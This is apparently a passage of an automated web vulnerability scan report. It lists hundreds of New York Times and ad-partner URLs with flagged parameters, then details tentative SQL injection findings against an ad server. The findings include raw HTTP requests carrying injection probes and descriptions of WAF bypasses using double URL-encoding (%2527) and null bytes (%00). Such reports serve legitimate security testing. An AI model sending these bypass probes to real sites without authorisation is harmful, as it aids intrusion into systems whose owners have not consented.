3.179. http://opinionator.blogs.nytimes.com/category/allison-arieff [REST URL parameter 2]

3.180. http://opinionator.blogs.nytimes.com/category/allison-arieff/feed/ [REST URL parameter 3]

3.181. http://opinionator.blogs.nytimes.com/category/allison-arieff/page/2/ [REST URL parameter 3]

3.182. http://opinionator.blogs.nytimes.com/category/dick-cavett [REST URL parameter 2]

3.183. http://opinionator.blogs.nytimes.com/category/dick-cavett/feed/ [REST URL parameter 3]

3.184. http://opinionator.blogs.nytimes.com/category/dick-cavett/page/2/ [REST URL parameter 3]

3.185. http://opinionator.blogs.nytimes.com/category/disunion [REST URL parameter 2]

3.186. http://opinionator.blogs.nytimes.com/category/disunion/ [REST URL parameter 2]

3.187. http://opinionator.blogs.nytimes.com/category/disunion/feed/ [REST URL parameter 3]

3.188. http://opinionator.blogs.nytimes.com/category/disunion/page/2/ [REST URL parameter 3]

3.189. http://opinionator.blogs.nytimes.com/category/errol-morris [REST URL parameter 2]

3.190. http://opinionator.blogs.nytimes.com/category/errol-morris/feed/ [REST URL parameter 3]

3.191. http://opinionator.blogs.nytimes.com/category/errol-morris/page/2/ [REST URL parameter 3]

3.192. http://opinionator.blogs.nytimes.com/category/fixes [REST URL parameter 2]

3.193. http://opinionator.blogs.nytimes.com/category/fixes/ [REST URL parameter 2]

3.194. http://opinionator.blogs.nytimes.com/category/fixes/feed/ [REST URL parameter 3]

3.195. http://opinionator.blogs.nytimes.com/category/fixes/page/2/ [REST URL parameter 3]

3.196. http://opinionator.blogs.nytimes.com/category/home-fires [REST URL parameter 2]

3.197. http://opinionator.blogs.nytimes.com/category/home-fires/ [REST URL parameter 2]

3.198. http://opinionator.blogs.nytimes.com/category/home-fires/feed/ [REST URL parameter 3]

3.199. http://opinionator.blogs.nytimes.com/category/home-fires/page/2/ [REST URL parameter 3]

3.200. http://opinionator.blogs.nytimes.com/category/linda-greenhouse [REST URL parameter 2]

3.201. http://opinionator.blogs.nytimes.com/category/linda-greenhouse/ [REST URL parameter 2]

3.202. http://opinionator.blogs.nytimes.com/category/linda-greenhouse/feed/ [REST URL parameter 3]

3.203. http://opinionator.blogs.nytimes.com/category/linda-greenhouse/page/2/ [REST URL parameter 3]

3.204. http://opinionator.blogs.nytimes.com/category/line-by-line [REST URL parameter 2]

3.205. http://opinionator.blogs.nytimes.com/category/line-by-line/ [REST URL parameter 2]

3.206. http://opinionator.blogs.nytimes.com/category/line-by-line/feed/ [REST URL parameter 3]

3.207. http://opinionator.blogs.nytimes.com/category/line-by-line/page/2/ [REST URL parameter 3]

3.208. http://opinionator.blogs.nytimes.com/category/living-rooms [REST URL parameter 2]

3.209. http://opinionator.blogs.nytimes.com/category/living-rooms/feed/ [REST URL parameter 3]

3.210. http://opinionator.blogs.nytimes.com/category/living-rooms/page/2/ [REST URL parameter 3]

3.211. http://opinionator.blogs.nytimes.com/category/peter-orszag [REST URL parameter 2]

3.212. http://opinionator.blogs.nytimes.com/category/peter-orszag/ [REST URL parameter 2]

3.213. http://opinionator.blogs.nytimes.com/category/peter-orszag/feed/ [REST URL parameter 3]

3.214. http://opinionator.blogs.nytimes.com/category/peter-orszag/page/2/ [REST URL parameter 3]

3.215. http://opinionator.blogs.nytimes.com/category/robert-wright [REST URL parameter 2]

3.216. http://opinionator.blogs.nytimes.com/category/robert-wright/ [REST URL parameter 2]

3.217. http://opinionator.blogs.nytimes.com/category/robert-wright/feed/ [REST URL parameter 3]

3.218. http://opinionator.blogs.nytimes.com/category/robert-wright/page/2/ [REST URL parameter 3]

3.219. http://opinionator.blogs.nytimes.com/category/stanley-fish [REST URL parameter 2]

3.220. http://opinionator.blogs.nytimes.com/category/stanley-fish/ [REST URL parameter 2]

3.221. http://opinionator.blogs.nytimes.com/category/stanley-fish/feed/ [REST URL parameter 3]

3.222. http://opinionator.blogs.nytimes.com/category/stanley-fish/page/2/ [REST URL parameter 3]

3.223. http://opinionator.blogs.nytimes.com/category/the-conversation [REST URL parameter 2]

3.224. http://opinionator.blogs.nytimes.com/category/the-conversation/ [REST URL parameter 2]

3.225. http://opinionator.blogs.nytimes.com/category/the-conversation/feed/ [REST URL parameter 3]

3.226. http://opinionator.blogs.nytimes.com/category/the-conversation/page/2/ [REST URL parameter 3]

3.227. http://opinionator.blogs.nytimes.com/category/the-score [REST URL parameter 2]

3.228. http://opinionator.blogs.nytimes.com/category/the-score/feed/ [REST URL parameter 3]

3.229. http://opinionator.blogs.nytimes.com/category/the-score/page/2/ [REST URL parameter 3]

3.230. http://opinionator.blogs.nytimes.com/category/the-stone [REST URL parameter 2]

3.231. http://opinionator.blogs.nytimes.com/category/the-stone/ [REST URL parameter 2]

3.232. http://opinionator.blogs.nytimes.com/category/the-stone/feed/ [REST URL parameter 3]

3.233. http://opinionator.blogs.nytimes.com/category/the-stone/page/2/ [REST URL parameter 3]

3.234. http://opinionator.blogs.nytimes.com/category/the-thread [REST URL parameter 2]

3.235. http://opinionator.blogs.nytimes.com/category/the-thread/ [REST URL parameter 2]

3.236. http://opinionator.blogs.nytimes.com/category/the-thread/feed/ [REST URL parameter 3]

3.237. http://opinionator.blogs.nytimes.com/category/the-thread/page/2/ [REST URL parameter 3]

3.238. http://opinionator.blogs.nytimes.com/category/timothy-egan [REST URL parameter 2]

3.239. http://opinionator.blogs.nytimes.com/category/timothy-egan/ [REST URL parameter 2]

3.240. http://opinionator.blogs.nytimes.com/category/timothy-egan/feed/ [REST URL parameter 3]

3.241. http://opinionator.blogs.nytimes.com/category/timothy-egan/page/2/ [REST URL parameter 3]

3.242. http://opinionator.blogs.nytimes.com/category/townie [REST URL parameter 2]

3.243. http://opinionator.blogs.nytimes.com/category/townie/page/2/ [REST URL parameter 3]

3.244. http://opinionator.blogs.nytimes.com/category/townies/ [REST URL parameter 2]

3.245. http://opinionator.blogs.nytimes.com/category/townies/feed [REST URL parameter 3]

3.246. http://opinionator.blogs.nytimes.com/category/william-d-cohan [REST URL parameter 2]

3.247. http://opinionator.blogs.nytimes.com/category/william-d-cohan/ [REST URL parameter 2]

3.248. http://opinionator.blogs.nytimes.com/category/william-d-cohan/feed/ [REST URL parameter 3]

3.249. http://opinionator.blogs.nytimes.com/category/william-d-cohan/page/2/ [REST URL parameter 3]

3.250. http://opinionator.blogs.nytimes.com/tag/alan-simpson/ [REST URL parameter 2]

3.251. http://opinionator.blogs.nytimes.com/tag/budget/ [REST URL parameter 2]

3.252. http://opinionator.blogs.nytimes.com/tag/erskine-bowles/ [REST URL parameter 2]

3.253. http://opinionator.blogs.nytimes.com/tag/federal-deficit/ [REST URL parameter 2]

3.254. http://opinionator.blogs.nytimes.com/tag/health-care-reform/ [REST URL parameter 2]

3.255. http://opinionator.blogs.nytimes.com/tag/social-security/ [REST URL parameter 2]

3.256. http://opinionator.blogs.nytimes.com/tag/taxes/ [REST URL parameter 2]

3.257. https://placead.nytimes.com/default.asp [CategoryID parameter]

3.258. http://prescriptions.blogs.nytimes.com/2010/11/12/group-says-camel-packs-lure-the-young/ [src parameter]

3.259. http://scientistatwork.blogs.nytimes.com/2010/11/12/drought-in-the-amazon-up-close-and-personal/ [src parameter]

3.260. http://scientistatwork.blogs.nytimes.com/2010/11/12/in-the-remote-pacific-glimpses-of-pristine-corals/ [src parameter]

3.261. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 1]

3.262. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 1]

3.263. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 2]

3.264. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 2]

3.265. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 2]

3.266. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 3]

3.267. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 3]

3.268. http://theater.nytimes.com/2010/11/11/theater/reviews/11play.html [name of an arbitrarily supplied request parameter]

3.269. http://theater.nytimes.com/2010/11/11/theater/reviews/11play.html [ref parameter]

3.270. http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html [hpw parameter]

3.271. http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html [name of an arbitrarily supplied request parameter]

3.272. http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html [ref parameter]

3.273. http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html [src parameter]

3.274. http://theater.nytimes.com/2010/11/12/theater/reviews/12radio.html [name of an arbitrarily supplied request parameter]

3.275. http://theater.nytimes.com/2010/11/12/theater/reviews/12radio.html [ref parameter]

3.276. http://theater.nytimes.com/2010/11/12/theater/reviews/12throne.html [hpw parameter]

3.277. http://theater.nytimes.com/2010/11/12/theater/reviews/12throne.html [name of an arbitrarily supplied request parameter]

3.278. http://theater.nytimes.com/2010/11/12/theater/reviews/12throne.html [ref parameter]

3.279. http://theater.nytimes.com/2010/11/13/theater/reviews/13notes.html [hpw parameter]

3.280. http://theater.nytimes.com/2010/11/13/theater/reviews/13notes.html [name of an arbitrarily supplied request parameter]

3.281. http://theater.nytimes.com/2010/11/13/theater/reviews/13notes.html [src parameter]

3.282. http://thecaucus.blogs.nytimes.com/2010/11/12/gov-perry-to-lead-republican-governors/ [src parameter]

3.283. http://thequad.blogs.nytimes.com/2010/11/12/quad-qa-sienas-ryan-rossiter/ [src parameter]

3.284. http://thequad.blogs.nytimes.com/2010/11/12/weekly-pick-em-crunch-time-in-the-sec/ [src parameter]

3.285. http://tmagazine.blogs.nytimes.com/2010/11/12/look-of-the-moment-v-b-s-tangerine-dream/ [src parameter]

3.286. http://topics.blogs.nytimes.com/tag/after-deadline/ [REST URL parameter 2]

3.287. http://topics.blogs.nytimes.com/tag/bees/ [REST URL parameter 2]

3.288. http://topics.blogs.nytimes.com/tag/coffee/ [REST URL parameter 2]

3.289. http://topics.blogs.nytimes.com/tag/composting/ [REST URL parameter 2]

3.290. http://trc.taboolasyndication.com/dispatch [item-type parameter]

3.291. http://trc.taboolasyndication.com/dispatch [list-id parameter]

3.292. http://trc.taboolasyndication.com/dispatch [publisher parameter]

3.293. http://us.blackberry.com/smartphones/blackberrytorch.jsp [REST URL parameter 2]

3.294. http://video.nytimes.com/ [name of an arbitrarily supplied request parameter]

3.295. http://video.nytimes.com/ [src parameter]

3.296. http://video.nytimes.com/video/2010/10/15/dining/1248068993504/quick-preserved-lemons.html [name of an arbitrarily supplied request parameter]

3.297. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 2]

3.298. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 3]

3.299. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 4]

3.300. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 5]

3.301. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 5]

3.302. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [REST URL parameter 5]

3.303. http://video.nytimes.com/video/2010/10/21/continuous/1248069216552/timescast-october-21-2010.html [name of an arbitrarily supplied request parameter]

3.304. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 2]

3.305. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 3]

3.306. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 4]

3.307. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 5]

3.308. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 5]

3.309. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [REST URL parameter 5]

3.310. http://video.nytimes.com/video/2010/10/22/dining/1248068993538/ricotta-cheese-gnocchi.html [name of an arbitrarily supplied request parameter]

3.311. http://video.nytimes.com/video/2010/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html [REST URL parameter 2]

3.312. http://video.nytimes.com/video/2010/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html [REST URL parameter 3]

3.313. http://video.nytimes.com/video/2010/10/22/nyregion/1248069217296/city-critic-patrolling-the-city.html [name of an arbitrarily supplied request parameter]

3.314. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 2]

3.315. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 3]

3.316. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 4]

3.317. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 5]

3.318. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 5]

3.319. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 5]

3.320. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 6]

3.321. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 6]

3.322. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [REST URL parameter 6]

3.323. http://video.nytimes.com/video/2010/10/23/world/asia/1248069229316/chinas-new-wave-music-festivals.html [name of an arbitrarily supplied request parameter]

3.324. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 2]

3.325. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 3]

3.326. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 4]

3.327. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 5]

3.328. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 5]

3.329. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [REST URL parameter 5]

3.330. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [name of an arbitrarily supplied request parameter]

3.331. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 2]

3.332. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 3]

3.333. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 4]

3.334. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 5]

3.335. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 5]

3.336. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 5]

3.337. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 6]

3.338. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 7]

3.339. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [name of an arbitrarily supplied request parameter]

3.340. http://video.nytimes.com/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html [REST URL parameter 2]

3.341. http://video.nytimes.com/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html [REST URL parameter 3]

3.342. http://video.nytimes.com/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html [REST URL parameter 4]

3.343. http://video.nytimes.com/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html [name of an arbitrarily supplied request parameter]

3.344. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 2]

3.345. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 3]

3.346. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 4]

3.347. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 5]

3.348. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 5]

3.349. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 5]

3.350. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 6]

3.351. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [REST URL parameter 7]

3.352. http://video.nytimes.com/video/2010/11/05/sports/1248069286580/zenyatta-competes-at-the-breeders-cup.html [name of an arbitrarily supplied request parameter]

3.353. http://video.nytimes.com/video/2010/11/08/business/media/1248069229412/chinese-animation-.html [REST URL parameter 2]

3.354. http://video.nytimes.com/video/2010/11/08/business/media/1248069229412/chinese-animation-.html [REST URL parameter 3]

3.355. http://video.nytimes.com/video/2010/11/08/business/media/1248069229412/chinese-animation-.html [REST URL parameter 4]

3.356. http://video.nytimes.com/video/2010/11/08/business/media/1248069229412/chinese-animation-.html [name of an arbitrarily supplied request parameter]

3.357. http://video.nytimes.com/video/2010/11/08/world/1248069302724/timescast-november-8-2010.html [REST URL parameter 2]

3.358. http://video.nytimes.com/video/2010/11/08/world/1248069302724/timescast-november-8-2010.html [name of an arbitrarily supplied request parameter]

3.359. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 2]

3.360. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 3]

3.361. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 4]

3.362. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 5]

3.363. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 5]

3.364. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [REST URL parameter 5]

3.365. http://video.nytimes.com/video/2010/11/08/world/europe/1248069280321/troubles-on-russias-lake-baikal.html [name of an arbitrarily supplied request parameter]

3.366. http://video.nytimes.com/video/2010/11/09/business/1248069304600/fed-move-not-enough.html [name of an arbitrarily supplied request parameter]

3.367. http://video.nytimes.com/video/2010/11/11/dining/1248069312941/tipsy-diaries-beans-with-booze.html [name of an arbitrarily supplied request parameter]

3.368. http://video.nytimes.com/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html [REST URL parameter 2]

3.369. http://video.nytimes.com/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html [REST URL parameter 3]

3.370. http://video.nytimes.com/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html [REST URL parameter 4]

3.371. http://video.nytimes.com/video/2010/11/12/business/1248069282083/a-recovery-for-wall-street-pay.html [name of an arbitrarily supplied request parameter]

3.372. http://video.nytimes.com/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html [REST URL parameter 2]

3.373. http://video.nytimes.com/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html [REST URL parameter 3]

3.374. http://video.nytimes.com/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html [REST URL parameter 4]

3.375. http://video.nytimes.com/video/2010/11/12/business/1248069321928/straining-to-make-mid-market-deals.html [name of an arbitrarily supplied request parameter]

3.376. http://video.nytimes.com/video/2010/11/12/multimedia/1248069223837/bayous-quagmire-for-goldman.html [name of an arbitrarily supplied request parameter]

3.377. http://video.nytimes.com/video/2010/11/12/world/1248069321921/timescast-november-12-2010.html [name of an arbitrarily supplied request parameter]

3.378. http://video.on.nytimes.com/ [name of an arbitrarily supplied request parameter]

3.379. http://homedelivery.nytimes.com/ [Referer HTTP header]

3.380. http://ipboutiquehotel.com/ [Referer HTTP header]

4. Open redirection

1. SQL injection next
There are 6 instances of this issue:

http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [ad parameter]
http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [camp parameter]
http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [name of an arbitrarily supplied request parameter]
http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [opzn&page parameter]
http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [pos parameter]
http://amch.questionmarket.com/adscgen/sta.php [REST URL parameter 2]

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [ad parameter] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N5739.NYTimes.com/B4990972.8

Issue detail

The ad parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ad parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ad request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt%2527&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1
Accept: */*
Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:49:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5579

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt%2527%2527&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1
Accept: */*
Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:49:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 434

document.write('<a target="_top" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/0/%2a/h;232242348;1-0;0;56070716;3454-728/90;39189060/39206847/1;;~okv=;pc=nyt148363_248885;;~sscs=%3fhttp://us.black
...[SNIP]...

1.2. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [camp parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N5739.NYTimes.com/B4990972.8

Issue detail

The camp parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the camp parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2%00'&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1
Accept: */*
Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:49:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5579

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
